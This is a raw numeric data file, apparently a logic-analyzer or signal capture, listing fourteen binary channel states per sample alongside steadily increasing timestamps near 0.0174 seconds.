1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286884e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286908e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286932e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7286956e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7286980e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7287004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7287032e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7287056e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7287084e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7287108e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7287132e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7287156e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7287180e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7287204e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7287232e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7287256e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7287284e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7287308e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7287332e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7287360e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,1.7287384e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,1.7287408e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,1.7287436e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,1.7411876e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.7412060e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7412080e-02 0,0,1,0,1,1,0,0,0,1,0,1,0,1,1.7412116e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7412136e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,1,1.7412468e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7412492e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,1.7412500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,1.7412540e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,1.7412568e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,1.7412620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,1.7412644e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,1.7412692e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7412708e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7412716e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7412768e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7412792e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7412844e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7412868e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7412892e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7412916e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7412940e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7412964e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413020e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413044e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413092e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413116e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7413124e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7413168e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7413192e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.7413196e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413200e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413244e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413268e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413316e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413340e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413364e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413392e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7413396e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7413416e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7413440e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.7413448e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413452e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413492e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413516e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413568e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413592e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413640e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413668e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413716e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413740e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7413748e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7413764e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7413792e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.7413796e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413800e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413816e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413840e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7413844e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7413892e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7413916e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413940e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7413964e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7413992e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414016e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414040e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414068e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414092e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414116e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7414124e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7414168e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7414192e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.7414196e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414200e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414216e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414244e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414268e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414292e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7414296e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7414316e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414348e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414396e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414420e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414472e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414496e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414548e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414572e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,1.7414576e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7414580e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7414596e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7414620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414628e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414644e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414672e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7414676e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7414696e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7414724e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.7414728e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414732e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414772e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414796e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414848e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414872e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7414948e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7414996e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415020e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7415028e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7415044e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7415072e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.7415076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415080e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415124e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,1.7415128e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7415132e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7415172e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7415200e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415204e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415220e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415244e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415272e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415300e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415324e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415348e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415372e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,1.7415400e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7415404e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7415448e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7415472e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.7415476e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415480e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415500e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415524e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415548e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415572e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415600e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415620e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415644e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415672e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415696e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415724e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415772e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415800e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415820e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415844e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415872e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415896e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7415972e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7415996e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7416048e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416072e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7416076e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7416124e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7416148e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416156e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7416196e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416220e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7416272e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416300e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7416324e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416344e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7416352e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7416372e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7416396e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.7416400e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416404e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7416444e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416468e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7416520e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416544e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7416596e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416620e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7416668e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416692e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7416700e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7416720e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7416744e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.7416748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416752e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7416772e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416796e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7416820e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416844e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,1.7416848e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7416852e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7416868e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7416892e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416900e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7416944e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7416972e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417020e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417044e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417092e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417120e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7417124e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7417144e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7417172e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417176e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417196e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417220e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417244e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417268e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417292e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417320e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417344e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417372e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417396e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417420e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417444e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417468e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417492e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417520e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417544e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7417572e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7417596e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7417620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417628e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417668e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417692e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417744e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417772e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417820e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417844e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417892e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417920e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7417924e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7417944e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7417972e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7417976e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7417996e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418020e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7418024e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7418044e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7418068e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418076e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418120e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418144e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418200e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418224e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418276e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418300e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418348e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418372e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7418380e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7418400e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7418424e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,1.7418428e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418432e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418452e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418476e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418500e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418524e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418548e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418572e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418600e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418624e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418652e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418676e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418724e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418772e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418800e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418824e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418852e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418876e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418900e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7418948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7418972e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419000e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419024e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419052e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419076e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419124e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419148e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419172e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419200e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419224e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419276e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419300e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419324e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419348e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419372e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419400e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419424e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419452e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419476e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419500e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419524e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419548e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419572e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419600e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419624e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419652e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419676e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419724e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419772e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419800e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419824e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419852e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419876e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419900e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7419948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7419972e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7419980e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7543780e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7543984e-02 1,0,1,0,1,1,0,0,0,1,0,1,0,1,1.7544012e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7544036e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,1.7544324e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7544356e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,1.7544380e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7544404e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,1.7544428e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7544452e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,1.7544476e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7544500e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,1.7544524e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7544552e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,1.7544576e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,1.7544604e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,1.7544608e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7544612e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7544628e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7544652e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7544676e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7544700e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7544708e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7544724e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7544752e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7544780e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7544800e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7544828e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7544852e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7544876e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7544900e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7544924e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7544952e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7544956e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7544980e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545000e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7545028e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545052e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,1.7545056e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545060e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7545076e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545100e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7545124e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545152e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7545172e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545200e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7545228e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545252e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545260e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7545276e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545300e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7545328e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545352e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545356e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7545372e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545400e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545404e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7545424e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545452e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7545476e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545500e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7545524e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545552e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,1.7545572e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,1.7545600e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,1.7545604e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,1.7545624e-02 